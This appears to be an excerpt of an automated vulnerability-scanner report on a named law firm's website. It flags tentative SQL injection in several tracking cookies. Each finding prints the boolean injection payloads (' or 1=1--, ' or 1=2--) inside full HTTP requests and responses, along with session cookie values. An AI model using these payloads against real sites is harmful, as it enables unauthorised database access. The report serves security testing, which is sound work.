Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 10291203'%20or%201%3d1--%20 and 10291203'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.210291203'%20or%201%3d1--%20; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:10:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Wed, 12-May-2010 16:10:44 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.210291203'%20or%201%3d2--%20; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:10:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.89. http://www.pillsburylaw.com/scripts/images/arrows-default.png [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 19736969'%20or%201%3d1--%20 and 19736969'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.130521654019736969'%20or%201%3d1--%20; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:12:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMB=;expires=Wed, 12-May-2010 16:12:12 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.130521654019736969'%20or%201%3d2--%20; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:12:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.90. http://www.pillsburylaw.com/scripts/images/arrows-default.png [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 11204199%20or%201%3d1--%20 and 11204199%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=24928704611204199%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:12:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Wed, 12-May-2010 16:12:18 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=24928704611204199%20or%201%3d2--%20

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:12:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.91. http://www.pillsburylaw.com/scripts/images/arrows-default.png [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 17691360'%20or%201%3d1--%20 and 17691360'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman17691360'%20or%201%3d1--%20; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:10:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Wed, 12-May-2010 16:10:51 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman17691360'%20or%201%3d2--%20; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:10:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.92. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hsfirstvisit cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The hsfirstvisit cookie appears to be vulnerable to SQL injection attacks. The payloads 90477653'%20or%201%3d1--%20 and 90477653'%20or%201%3d2--%20 were each submitted in the hsfirstvisit cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A4690477653'%20or%201%3d1--%20; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:11:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HSFIRSTVISIT=;expires=Wed, 12-May-2010 16:11:29 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A4690477653'%20or%201%3d2--%20; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


